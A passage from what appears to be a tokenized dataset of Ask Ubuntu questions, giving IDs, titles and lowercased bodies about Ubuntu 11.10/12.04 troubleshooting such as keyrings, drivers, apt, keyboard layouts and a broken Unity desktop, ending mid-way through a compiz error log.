( rev 01 ) 03:09.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 03:09.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 03:09.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 03:09.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) i 'm on an hp pavilion dv2000 with a dual-boot of windows 7 , if any of that is relevant .
122969	keyring wo n't unlock untill web browser is open	using ubuntu 11.10 on an hp mini1010nr . ubuntu does not ask for keyring unlock untill after i open either chromium or firefox . also sometimes i may be on for 30+ minuets then the screen blanks and i get the ubuntu login screen asking for my password again . can anyone please tell me what is wrong and how to fix it as i am quite new to linux and am still unfamiliar with bash
122977	can not login as guest or create new user	i ca n't login as a guest . the screen goes to the black screen with blinking cursor for a second then straight back to login scree . i can still log in as myself ( administrator ) and tried to create a new user . this failed too giving me the following message : running '/usr/sbin/adduser ' failed : /usr/sbin/adduser returned an error ( 1 ) : useradd : can not lock /etc/passwd ; try again later . adduser : `/usr/sbin/useradd -d /home/joe -g joe -s /bin/bash -u 1001 joe ' returned error code 1 . exiting . any help much appreciated . i am running ubuntu 11.10 on a netbook . thanks matt
122979	enable thumb detection on macbook pro	i have successfully installed ubuntu 11.10 and 12.04 on my macbook pro 8.1 and now i have issues with my touchpad . i am used to click the button of the pad instead of tapping it to click an item , however the touchpad does not allow me to move the cursor with one finger while having my thumb on the button on the bottom . this is extremely weird and driving me crazy - is there any way to configure ubuntu or the driver to allow the thumb being on the pad without being recognized ? ( maybe by increasing the necessary pressure on it ? )
122982	device shows up in lsusb + adb but not in ifconfig	i 'm running ubuntu in the vmware player under windows 7 : root @ ubuntu : / # uname -a linux ubuntu 3.0.0-17-generic # 30-ubuntu smp thu mar 8 17:34:21 utc 2012 i686 \ i686 i386 gnu/linux i 'm trying to establish a network connection to my htc desire via usb . after plugging it in the device shows up when typing the lsusb command : root @ ubuntu : / # lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 0bb4:0c87 high tech computer corp . desire ( debug ) i can also talk to it via the android debug bridge : root @ ubuntu : / # adb devices list of devices attached ht08lpl00400 device when i run ifconfig i expect the device to appear under usb0 , but no usb interface shows up : root @ ubuntu : / # ifconfig eth0 link encap : ethernet hwaddr 00:0c:29:4f:5a:28 inet addr:192.168.159.145 bcast:192.168.159.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fe4f:5a28/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:251857 errors:1 dropped:1 overruns:0 frame:0 tx packets:147151 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:340675522 ( 340.6 mb ) tx bytes:12163470 ( 12.1 mb ) interrupt:19 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:15115 errors:0 dropped:0 overruns:0 frame:0 tx packets:15115 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5352740 ( 5.3 mb ) tx bytes:5352740 ( 5.3 mb ) anyone knows what i can do ? thanks !
122984	how to find out what a program does	when i call ps ax , i get a list of running processes . some of them i know by name ( firefox , java , scala , you name it ) . most of the others , i can find with man name , and try to find out , what they 're doing . if there is no man page for the program , i 'm getting annoyed . but there is apt-cache search name , where i can find out from which package it comes , hoping to find an explanation . example : apt-cache search wpa_supplicant yields wpagui - graphical user interface for wpa_supplicant . if apt-cache does n't show anything , there is still the small hope , that file $ ( locate name ) finds a script or something else with further informations . however , for rkit-daemon i did n't find anything useful . for file $ ( locate gvfs-gphoto2-volume-monitor ) i only find a binary executable but no informations . i might try to decipher gnome-virtual-file-sytem ... and guess , it could be a tool to detect photo-sd cards and the like , if connected to the pc , but is there a better way to find out , what the processes , running on my pc , are doing ? do i really have to google ? why is n't there some documentation about these processes or where do i find them ? is there an organized location to search them , or do i have to search them on a case-by-case-basis ? i guess i could download the source of the whole system , and search the source , but there is rarely additional information for users , but for developers .
122990	partition installation issues.how to install ubuntu on 3tb drive with pre-installed windows 7 .	3tb drive partitions : ntfs ( 100mb ) - reserved by windows 7 ntfs ( 70gb ) - system partition for windows 7 unallocated 100gb for ubuntu ntfs ( 385gb ) common files -deocs.. etc ... as suggested by 1 mil outdated of linux pages unallocated unllocated partitions 5 and 6 are the rest of the 2.3tb i have acronis for partitioning ... when i try to install ubuntu 11.10 on partition 3 using livecd , the installation just stop there ... error ... too many sectors ... msdos ... ? any help will be appreciated .
122993	minecraft diagonal graphics glitches on ubuntu 11.10 x64bits , not happening on ubuntu 12 beta 2 x64bits	minecraft has severe graphics glitches ( diagonally split view on the minecraft window , half the image of the background and half minecraft . ) it flashes sometimes.. i do n't know if that is relevant but i read something on the opengl documentation about graphic images not being dividable by 4 or something , which causes the diagonal corruption of the final image . so . i tested minecraft in ubuntu 12 beta 2 ( 64bit ) which did not have that graphical error . i upgraded the kernel to the version ubuntu 12 had ( 3.2 ) , however same problem occurs . i have intel b800 processor , with intel hd graphics 2000 i presume . it does n't tell on ark.intel.com website . using lspci -v outputs 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : device 1b0a:2080 flags : bus master , fast devsel , latency 0 , irq 45 memory at f5000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at e000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 capabilities : [ a4 ] pci advanced features kernel driver in use : i915 kernel modules : i915 when minecraft is open , the ubuntu interface also lags , like text etc , buttons also split diagonally in half ... its weird .
122999	apt-get update really slow when i 'm at the university	when i 'm using my university connection i ca n't run apt-get update normally as i do at home or any other place . everything else ( that use connection ) works properly . i 've already tried to change the repositories provider to a local one ( brasil ) and now i 'm using the official canonical repos . it does n't leave 0 % [ waiting headers ] part . how could i debug this ? what should i tracert to find where the connection is goin down ?
123000	how do i set up a private apt repository that can support multiple versions ?	i 'm looking on how to setup a private apt repository ( on 10.04 lts ) that can support multiple versions . i understand that you can not have multiple versions of a package installed on a server . this is a purely for a development environment where we want to be able to test multiple versions before releasing them to the production apt repository . i know you can have multiple versions by putting the version number in the package name , however i want to achieve the opposite , support multiple versions of a same package name . e.g . packagename_1.0_all.deb and packagename_2.0_all.deb rather than packagename-1.0_1.0_all.deb and packagename-2.0_2.0_all.deb for those that are familiar with puppet automated eployment - we can specify what version of a package we want on a server ( with the ensure tag using the same package name ) . i 've tried google 's debmarshal described at http : //wiki.debian.org/howtosetupadebianrepository but could not get it to work due to a lack of documentation .
123002	chromium not displaying separate instances on the launcher	above is a picture regarding how chromium is acting once i 've added it to my sidebar as a permanent button . it 's not indicating that an instance of chromium is open by the `` side arrows '' next to the images on the side bar , as well as , if i were to minimize the window i would n't be able to open it back up . is there anyway to get the functionality of chromium to where i have control over separate instances of the program from the left side bar ? thanks for any help !
123005	ca n't install on an asus eee pc 900 due to udev timeout error	i have an asus eee pc 900 . i am trying to install using a bootable usb drive . i have tried installing ubuntu 11.10 and 10.04 as well as lubuntu 11.10 . every time a get a repeating message to the effect of udevd [ 100 ] : timeout : killing '/sbin/blkid -o udev -p /dev/sdc ' [ 252 ] followed by a message saying that process was killed and then nothing . what can i do ?
123006	says `` installing system '' but not doing anything	i 'm installing 11.10 on a homemade system with intel motherboard and 1 gb ram . it downloaded packages but now it 's at `` installing system '' with about 10 % of the status bar left and it 's doing nothing . cd-rom is not flashing , hard drive is not flashing . the little circle thing just spins . any ideas ? thank you
123007	how to hold back driver updates or prevent packages from installing .	is there something i can do ( opt-out from the update list ) to stop the drivers getting updated ? i 'd still like to update most of the packages . the reason , -after an update- i lost 3d . trying to solve it left me with a 640x400 screen ! it took me 3 re-installations ( finally i disconnected from the internet to avoid updates during install ) to get the 3d back . now i 'm terrified to do an automatic update . the graphics card is a nvidia gf108 ( geforce gt540m rev a1 ) . help much appreciated . jorge .
123009	migrating a wubi install and drivers , and data when the wubi install is messed up	i accidentally installed a non-functional video driver using the jockey tool . that lead to me only seeing this on a reboot . which leads to my question : i read up on migrating my wubi install , and i think it 's time for me to format over xp ( do n't know why i hold on to it , since i have windows 7 on that tower as well ) and install ubuntu on my second hard drive . i 'm ready to copy my root.disk off of my computer , but i have a question with the migration process . i borked something up bad on my wubi install , so if i were to migrate my data from my wubi install 's virtual disk to my upcoming 12.04 install done the old-fashioned way , would my mistakes carry over to my new install ? i do n't think i 'll lose anything of importance , but if i have the chance to recover that stuff , i 'd like to take it .
123010	keyboard layouts missing in keyboard layout -- precise upgrade	this is from a bug i reported that never got a response . that was a 11.10 upgrade and now with a precise upgrade , the issue continues with the precise upgrade . symptom i ca n't add alternative keyboard layouts . steps to reproduce go to keyboard layout press the + button nothing at all appears . that is , no selections to choose from . realize the + button is faded , despite that the other buttons ( - and others ) light up . expected results alternative keyboard layouts should appear to choose from . this is what i 've done since then without results that stick . thinking that the problem is linked to the fact that i uninstalled other-than-english language support with bleachbit , i did the following : reinstalled language-selector-gnome reinstalled language-pack-en-base i went back to keyboard layout and the + button is still faded . i even went so far as to add spanish locale to see if i could add another layout , but this did n't make a difference . i ca n't add any layouts to the ones i already have installed ( us alternative , us international , english mac , and the international alt/gr version ) . i tried the following : dpkg-reconfigure locales update-locale lang=en_us.utf-8 although it did seem to update my locale settings , when i went back to keyboard layout , the + button was still faded . i have n't tried dpkg-reconfigure localeconfig because this is not installed and apparently xkeyboard-config is an eol . xkb-data looks promising from the description in the software center : '' this package contains configuration data used by the x keyboard extension ( xkb ) , which allows selection of keyboard layouts when using a graphical interface . '' a quick wajig reinstall xkb-data proved my hopes wrong . it seems the only thing that temporarily allowed me to install more layouts was sudo dpkg-reconfigure keyboard-configuration . i selected the colemak layout to see if it took . i ran it but by the time i rebooted , the change did n't stick . i just reinstalled iso-codes , and for a few minutes i saw that the keyboard applet showed colemak i had installed previously with . i relogged back in and it was gone , but colemak shows in cat /etc/default/keyboard but not in xorg . a quick ctrl+alt+f1 showed me that it did take , but only in console . xkbmodel= '' pc104 '' xkblayout= '' us '' xkbvariant= '' colemak '' xkboptions= '' terminate : ctrl_alt_bksp '' somehow i do n't think sudo dpkg-reconfigure keyboard-configuration was meant to ( only ? ) change the console layout . i 'm just reading /etc/default/keyboard and it says the following : # if you change any of the following variables and x is configured to # use this file , then the changes will become visible to x only if udev # is restarted . you may need to reboot the system . i can assume that x is listening , at least until i reboot , when changes are thrown away . so , i assume there is a conflict between more than one file or sets of files as to which layouts take predominance . any ideas anyone ? this one has me stumped . oh , and i wonder if this keyboard input method system menu selection under language support has anything to do with this . i would assume no . aside another solution , if i were n't already using my own .xmodmap file would be to do something like sudo xmodmap /usr/share/xmodmap/xmodmap.uk .
123015	is it safe to update an iphone 's firmware with vmware ?	i would like to know if it 's safe to update the firmware of my iphone 4s through a windows xp virtual machine created on vmware workstation 8 with forwarded usb . thanks .
123017	unity 3d shows only wallpaper where as unity 2d works fine	i just upgraded from ubuntu 11.10 to 12.04 . when i log in into unity 3d and gnome 3 i only get a wallpaper for few seconds and then the screen goes blank with mouse pointer showing . i can easily log in to unity 2d and gnome classic ( no effects ) . i have nvidia geforce 7025 / nforce 630a/integrated/sse2/3dnow ! graphic card . i checked my card compatibility using /usr/lib/nux/unity_support_test -p and came out with following result : jeevan @ jeevan-system-product-name : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : geforce 7025 / nforce 630a/integrated/sse2/3dnow ! opengl version string : 2.1.2 nvidia 295.40 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes after lot of reading and going through several post and also trying different solutions to it i am still not able to get unity 3d working . i think the problem is with the nvidia graphic driver 295.40 which is crashing compiz . i tried to roll back to nvidia 295.33 but it does n't allow me to do so as it keeps asking to install from root . i can not find anyway to login as root . i badly need help . i somehow want to get unity 3d running . any advice would be appreciated .
123018	how to add quicklists to gtk2 application ?	we want to add quicklists to our app nitro . however nitro uses gtk2 as it uses the pywebkitgtk library . as far as i 'm aware , we ca n't use quicklists because it requires pygi which requires gtk3 and there is no pywebkitgtk for gtk3 . is there a way around this ?
123019	epson 2400 scanner does n't work	my epson perfection 2400 photo usb-scanner does n't work in 12.04 . the scanner is recognized , but in snapscan.conf , the backend eswf41.bin gave me an error . i have tried to start the scanner with epkowa.conf , but that did not work . what else can i try ?
123024	is it ok to use 64bit ubuntu for development purposes ?	i 'm trying to install 32/64 bit ubuntu on my 6gb memory equipped pc . i 'm going to use the ubuntu pc mainly for development purposes - xilinx fpga development , gcc both for 8086 and arm software development including linux kernel compile . is it ok to use 64bit ubuntu for these purposes ? when i tried to download ubuntu 32bit version is recommended , so i wonder if anything is wrong with 64 bit ubuntu for whatever reason .
123025	what is the correct way to share directories in mac and ubuntu with correct permissions ?	in virtualbox , what is the best way to share a directory between an os x host and ubuntu guest ? host : mac os x 10.7.3 guest : ubuntu 12.04 guest has a shared directory mounted via virtualbox settings with access=full and auto-mount=yes . the problem with this setup is illustrated below . in my shared directory , i ca n't change the permissions at all ( not a permissions denied error , but they just do n't take effect ) . ubuntu 12.04 ( guest ) : % ls -l total 0 -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 1 -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 10 -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 2 -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 3 -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 4 -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 5 -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 6 -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 7 -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 8 -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 9 mac os x 10.7.3 ( host ) : $ ls -l total 0 -rw-r -- r -- 1 < my-mac-user > staff 0 apr 17 21:56 1 -rw-r -- r -- 1 < my-mac-user > staff 0 apr 17 21:56 10 -rw-r -- r -- 1 < my-mac-user > staff 0 apr 17 21:56 2 -rw-r -- r -- 1 < my-mac-user > staff 0 apr 17 21:56 3 -rw-r -- r -- 1 < my-mac-user > staff 0 apr 17 21:56 4 -rw-r -- r -- 1 < my-mac-user > staff 0 apr 17 21:56 5 -rw-r -- r -- 1 < my-mac-user > staff 0 apr 17 21:56 6 -rw-r -- r -- 1 < my-mac-user > staff 0 apr 17 21:56 7 -rw-r -- r -- 1 < my-mac-user > staff 0 apr 17 21:56 8 -rw-r -- r -- 1 < my-mac-user > staff 0 apr 17 21:56 9 if i chmod on the guest , nothing changes : % chmod +x 1 | ls -l 1 # guest -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 1 if i chmod on the host , it changes on the host but not on the guest : $ chmod +x 1 | ls -l 1 # host -rwxrwx -- x 1 < my-mac-user > staff 0 apr 17 21:56 1 % ls -l 1 # guest -rwxrwx -- - 1 root vboxsf 0 apr 17 21:56 1
123028	convert videos in ubuntu	i want to convert videos to 3gp format ? so is there any good tool available to convert this ?
123032	how do i set up multi-seat audio with multiple sound cards	i want to build a multi-seat system with two seats . the first seat will be dedicated to run a mythtv front end client and this seat 's video/audio will be sent to multiple tv 's in other rooms via a modulator . the second seat will be a `` normal '' computer console with the usual monitor and speakers . both seats will have their own dedicated hardware . the myth seat will have a tbd sound card while the computer seat will use the motherboard 's integrated audio . i am presently running 10.04lts ; however , i can upgrade if required . i believe the solution may involve the proper configuration of pulseaudio ; however , it is not apparent to me how to do this ( hence the question ) . i found this link where someone apparently got it working by forcing pulseaudio to operate system wide . the pulseaudio developers explicitly discourage this usage ( www.freedesktop.org/wiki/software/pulseaudio/documentation/user/whatiswrongwithsystemwide ) . background : i presently have a functionally similar system that is built around the pvr-350 which handles the audio output independent of the normal linux audio system so this was n't an issue . my pvr-350 is slowly failing and so i need to rebuild the system using current hardware .
123034	why do i have unity and gnome classic running at the same time ?	i 've recently updated and found that unity shows on the gnome-classic/fallback desktop . is this a new feature ( which i doubt to be ) , or a bug ? if it is a bug , tell me how to disable unity because it interferes with the lower panel ( i.e . i bring out trash instead of showing the desktop when i try pressing the `` show desktop '' button when the panel is not in focus ) . i do n't encounter this problem in gnome-classic ( no effects ) . do n't judge me . i like pokemon !
123039	why is dpkg configuration running out of space on ubuntu 10.04 when there is space available ?	i have 7gb available but ... ~ # dpkg -- configure -a setting up linux-image-2.6.32-31-generic-pae ( 2.6.32-31.61 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.32-31-generic-pae gzip : stdout : no space left on device update-initramfs : failed for /boot/initrd.img-2.6.32-31-generic-pae failed to create initrd image . dpkg : error processing linux-image-2.6.32-31-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-2.6.32-31-generic-pae ; however : package linux-image-2.6.32-31-generic-pae is not configured yet . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-image-generic-pae ( = 2.6.32.31.37 ) ; however : package linux-image-generic-pae is not configured yet . dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-2.6.32-31-generic-pae linux-image-generic-pae linux-generic-pae ~ # df filesystem 1k-blocks used available use % mounted on /dev/sda3 18577148 10255512 7377972 59 % / none 1026416 164 1026252 1 % /dev none 1030624 0 1030624 0 % /dev/shm none 1030624 100 1030524 1 % /var/run none 1030624 4 1030620 1 % /var/lock none 1030624 0 1030624 0 % /lib/init/rw /dev/sda1 93207 87960 435 100 % /boot ~ # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.2 lts release : 10.04 codename : lucid any idea why this is failing ?
123041	toshiba dx735 touch screen does n't work	i just purchased this pc , and i 'm going to dual-boot it with ubuntu 12.04 64-bit . i know that the touchscreen does n't work when i use a ubuntu 11.10 live cd ( 32-bit ) . is there a driver that will work on ubuntu for this touch screen and can you please ( if available ) leave a link to the .deb file or something ?
123055	how to run commands at login on ubuntu 12.04 ?	i have the file ~/.xmodmap where i swap a few keys on my keyboard . this file was loaded properly on my previous ubuntu desktop but since the upgrade to 12.04 it 's no longer loaded when i login to my desktop . what 's the proper way to execute commands when we login to the desktop in ubuntu 12.04 ?
123059	i broke my unity by using cairo dock ppa , how do i fix it ?	i installed cairo dock like so sudo add-apt-repository ppa : cairo-dock-team sudo apt-get update sudo apt-get install cairo-dock cairo-dock-plug-ins after i booted up and selected with graphics effect i could n't see anything pop up expect the desktop and mouse after a min or two i power off my machine then booted up unity but could n't see anything but the panel which was blue according to my theme . i purged the ppa and did some extra stuff like so sudo ppa-purge ppa : cairo-dock-team sudo apt-get purge cairo-dock cairo-dock-plug-ins sudo apt-get update sudo apt-get autoremove sudo apt-get check sudo apt-get clean sudo apt-get autoclean nautilus -- check it removed everything no error whit the exception of nautilus -- check blade @ blade-satellite-l750 : ~ $ nautilus -- check running nautilus_self_check_file_utilities running nautilus_self_check_file_operations running nautilus_self_check_directory running nautilus_self_check_file running nautilus_self_check_icon_container running nautilus_self_check_file_utilities running nautilus_self_check_file_operations running nautilus_self_check_directory running nautilus_self_check_file running nautilus_self_check_icon_container my question is how do i get unity up and running again i already tried sudo apt-get install ubuntu-desktop if something got deleted with out me knowing it . and also unity reset which works . for the dash but after a reboot it would n't start up again i also tried sudo compiz -- replace but no luck here is the output for compiz -- replace backend : ini integration : true profile : default adding plugins skipping upgrade com.canonical.unity.unity.01.upgrade skipping upgrade com.canonical.unity.unity.02.upgrade initializing core options ... done initializing bailer options ... [ error ] : option `` fatal_fallback_mode '' already defined [ error ] : option `` custom_fallback_window_manager '' already defined [ error ] : option `` custom_alternative_shell '' already defined [ error ] : option `` poor_performance_fallback '' already defined [ error ] : option `` bad_performance_threshold '' already defined [ error ] : option `` bad_plugins '' already defined done initializing detection options ... [ error ] : option `` detect_bad_pci '' already defined [ error ] : option `` detect_bad_drivers '' already defined done initializing composite options ... [ error ] : option `` slow_animations_key '' already defined [ error ] : option `` detect_refresh_rate '' already defined [ error ] : option `` refresh_rate '' already defined [ error ] : option `` unredirect_fullscreen_windows '' already defined [ error ] : option `` force_independent_output_painting '' already defined done initializing opengl options ... [ error ] : option `` texture_filter '' already defined [ error ] : option `` lighting '' already defined [ error ] : option `` sync_to_vblank '' already defined [ error ] : option `` texture_compression '' already defined done initializing decor options ... [ error ] : option `` shadow_radius '' already defined [ error ] : option `` shadow_opacity '' already defined [ error ] : option `` shadow_color '' already defined [ error ] : option `` shadow_x_offset '' already defined [ error ] : option `` shadow_y_offset '' already defined [ error ] : option `` command '' already defined [ error ] : option `` mipmap '' already defined [ error ] : option `` decoration_match '' already defined [ error ] : option `` shadow_match '' already defined done initializing mousepoll options ... [ error ] : option `` mouse_poll_interval '' already defined done initializing vpswitch options ... done initializing animation options ... [ error ] : option `` open_effects '' already defined [ error ] : option `` open_durations '' already defined [ error ] : option `` open_matches '' already defined [ error ] : option `` open_options '' already defined [ error ] : option `` open_random_effects '' already defined [ error ] : option `` close_effects '' already defined [ error ] : option `` close_durations '' already defined [ error ] : option `` close_matches '' already defined [ error ] : option `` close_options '' already defined [ error ] : option `` close_random_effects '' already defined [ error ] : option `` minimize_effects '' already defined [ error ] : option `` minimize_durations '' already defined [ error ] : option `` minimize_matches '' already defined [ error ] : option `` minimize_options '' already defined [ error ] : option `` minimize_random_effects '' already defined [ error ] : option `` shade_effects '' already defined [ error ] : option `` shade_durations '' already defined [ error ] : option `` shade_matches '' already defined [ error ] : option `` shade_options '' already defined [ error ] : option `` shade_random_effects '' already defined [ error ] : option `` focus_effects '' already defined [ error ] : option `` focus_durations '' already defined [ error ] : option `` focus_matches '' already defined [ error ] : option `` focus_options '' already defined [ error ] : option `` all_random '' already defined [ error ] : option `` time_step '' already defined [ error ] : option `` curved_fold_amp_mult '' already defined [ error ] : option `` curved_fold_zoom_to_taskbar '' already defined [ error ] : option `` dodge_mode '' already defined [ error ] : option `` dodge_gap_ratio '' already defined [ error ] : option `` dream_zoom_to_taskbar '' already defined [ error ] : option `` glide1_away_position '' already defined [ error ] : option `` glide1_away_angle '' already defined [ error ] : option `` glide1_zoom_to_taskbar '' already defined [ error ] : option `` glide2_away_position '' already defined [ error ] : option `` glide2_away_angle '' already defined [ error ] : option `` glide2_zoom_to_taskbar '' already defined [ error ] : option `` horizontal_folds_amp_mult '' already defined [ error ] : option `` horizontal_folds_num_folds '' already defined [ error ] : option `` horizontal_folds_zoom_to_taskbar '' already defined [ error ] : option `` magic_lamp_moving_end '' already defined [ error ] : option `` magic_lamp_grid_res '' already defined [ error ] : option `` magic_lamp_open_start_width '' already defined [ error ] : option `` magic_lamp_wavy_moving_end '' already defined [ error ] : option `` magic_lamp_wavy_grid_res '' already defined [ error ] : option `` magic_lamp_wavy_max_waves '' already defined [ error ] : option `` magic_lamp_wavy_amp_min '' already defined [ error ] : option `` magic_lamp_wavy_amp_max '' already defined [ error ] : option `` magic_lamp_wavy_open_start_width '' already defined [ error ] : option `` rollup_fixed_interior '' already defined [ error ] : option `` sidekick_num_rotations '' already defined [ error ] : option `` sidekick_springiness '' already defined [ error ] : option `` sidekick_zoom_from_center '' already defined [ error ] : option `` wave_width '' already defined [ error ] : option `` wave_amp_mult '' already defined [ error ] : option `` zoom_from_center '' already defined [ error ] : option `` zoom_springiness '' already defined done initializing snap options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing move options ... [ error ] : option `` initiate_button '' already defined [ error ] : option `` initiate_key '' already defined [ error ] : option `` opacity '' already defined [ error ] : option `` constrain_y '' already defined [ error ] : option `` snapoff_maximized '' already defined [ error ] : option `` lazy_positioning '' already defined done initializing place options ... [ error ] : option `` workarounds '' already defined [ error ] : option `` mode '' already defined [ error ] : option `` multioutput_mode '' already defined [ error ] : option `` force_placement_match '' already defined [ error ] : option `` position_matches '' already defined [ error ] : option `` position_x_values '' already defined [ error ] : option `` position_y_values '' already defined [ error ] : option `` position_constrain_workarea '' already defined [ error ] : option `` mode_matches '' already defined [ error ] : option `` mode_modes '' already defined [ error ] : option `` viewport_matches '' already defined [ error ] : option `` viewport_x_values '' already defined [ error ] : option `` viewport_y_values '' already defined done initializing grid options ... [ error ] : option `` put_center_key '' already defined [ error ] : option `` put_left_key '' already defined [ error ] : option `` put_right_key '' already defined [ error ] : option `` put_top_key '' already defined [ error ] : option `` put_bottom_key '' already defined [ error ] : option `` put_topleft_key '' already defined [ error ] : option `` put_topright_key '' already defined [ error ] : option `` put_bottomleft_key '' already defined [ error ] : option `` put_bottomright_key '' already defined [ error ] : option `` put_maximize_key '' already defined [ error ] : option `` put_restore_key '' already defined [ error ] : option `` top_left_corner_action '' already defined [ error ] : option `` top_edge_action '' already defined [ error ] : option `` top_right_corner_action '' already defined [ error ] : option `` left_edge_action '' already defined [ error ] : option `` right_edge_action '' already defined [ error ] : option `` bottom_left_corner_action '' already defined [ error ] : option `` bottom_edge_action '' already defined [ error ] : option `` bottom_right_corner_action '' already defined [ error ] : option `` snapoff_maximized '' already defined [ error ] : option `` snapback_windows '' already defined [ error ] : option `` left_edge_threshold '' already defined [ error ] : option `` right_edge_threshold '' already defined [ error ] : option `` top_edge_threshold '' already defined [ error ] : option `` bottom_edge_threshold '' already defined [ error ] : option `` draw_indicator '' already defined [ error ] : option `` outline_color '' already defined [ error ] : option `` fill_color '' already defined done initializing gnomecompat options ... [ error ] : option `` main_menu_key '' already defined [ error ] : option `` run_key '' already defined [ error ] : option `` command_screenshot '' already defined [ error ] : option `` run_command_screenshot_key '' already defined [ error ] : option `` command_window_screenshot '' already defined [ error ] : option `` run_command_window_screenshot_key '' already defined [ error ] : option `` command_terminal '' already defined [ error ] : option `` run_command_terminal_key '' already defined done initializing wall options ... [ error ] : option `` show_switcher '' already defined [ error ] : option `` miniscreen '' already defined [ error ] : option `` preview_timeout '' already defined [ error ] : option `` preview_scale '' already defined [ error ] : option `` edge_radius '' already defined [ error ] : option `` border_width '' already defined [ error ] : option `` outline_color '' already defined [ error ] : option `` background_gradient_base_color '' already defined [ error ] : option `` background_gradient_highlight_color '' already defined [ error ] : option `` background_gradient_shadow_color '' already defined [ error ] : option `` thumb_gradient_base_color '' already defined [ error ] : option `` thumb_gradient_highlight_color '' already defined [ error ] : option `` thumb_highlight_gradient_base_color '' already defined [ error ] : option `` thumb_highlight_gradient_shadow_color '' already defined [ error ] : option `` arrow_base_color '' already defined [ error ] : option `` arrow_shadow_color '' already defined [ error ] : option `` allow_wraparound '' already defined [ error ] : option `` slide_duration '' already defined [ error ] : option `` no_slide_match '' already defined [ error ] : option `` left_key '' already defined [ error ] : option `` left_button '' already defined [ error ] : option `` right_key '' already defined [ error ] : option `` right_button '' already defined [ error ] : option `` up_key '' already defined [ error ] : option `` up_button '' already defined [ error ] : option `` down_key '' already defined [ error ] : option `` down_button '' already defined [ error ] : option `` next_key '' already defined [ error ] : option `` next_button '' already defined [ error ] : option `` prev_key '' already defined [ error ] : option `` prev_button '' already defined [ error ] : option `` left_window_key '' already defined [ error ] : option `` right_window_key '' already defined [ error ] : option `` up_window_key '' already defined [ error ] : option `` down_window_key '' already defined [ error ] : option `` flip_left_edge '' already defined [ error ] : option `` flip_right_edge '' already defined [ error ] : option `` flip_up_edge '' already defined [ error ] : option `` flip_down_edge '' already defined [ error ] : option `` mmmode '' already defined [ error ] : option `` edgeflip_pointer '' already defined [ error ] : option `` edgeflip_move '' already defined [ error ] : option `` edgeflip_dnd '' already defined done initializing ezoom options ... [ error ] : option `` set_zoom_area '' already defined [ error ] : option `` ensure_visibility '' already defined [ error ] : option `` zoom_in_button '' already defined [ error ] : option `` zoom_in_key '' already defined [ error ] : option `` zoom_out_button '' already defined [ error ] : option `` zoom_out_key '' already defined [ error ] : option `` zoom_box_button '' already defined [ error ] : option `` center_mouse_key '' already defined [ error ] : option `` zoom_specific_1_key '' already defined [ error ] : option `` zoom_spec1 '' already defined [ error ] : option `` zoom_specific_2_key '' already defined [ error ] : option `` zoom_spec2 '' already defined [ error ] : option `` zoom_specific_3_key '' already defined [ error ] : option `` zoom_spec3 '' already defined [ error ] : option `` spec_target_focus '' already defined [ error ] : option `` lock_zoom_key '' already defined [ error ] : option `` pan_left_key '' already defined [ error ] : option `` pan_right_key '' already defined [ error ] : option `` pan_up_key '' already defined [ error ] : option `` pan_down_key '' already defined [ error ] : option `` fit_to_zoom_key '' already defined [ error ] : option `` fit_to_window_key '' already defined [ error ] : option `` zoom_factor '' already defined [ error ] : option `` minimum_zoom '' already defined [ error ] : option `` zoom_mode '' already defined [ error ] : option `` scale_mouse '' already defined [ error ] : option `` scale_mouse_dynamic '' already defined [ error ] : option `` scale_mouse_static '' already defined [ error ] : option `` hide_original_mouse '' already defined [ error ] : option `` restrain_mouse '' already defined [ error ] : option `` restrain_margin '' already defined [ error ] : option `` pan_factor '' already defined [ error ] : option `` follow_focus '' already defined [ error ] : option `` focus_fit_window '' already defined [ error ] : option `` autoscale_min '' already defined [ error ] : option `` always_focus_fit_window '' already defined [ error ] : option `` follow_focus_delay '' already defined [ error ] : option `` speed '' already defined [ error ] : 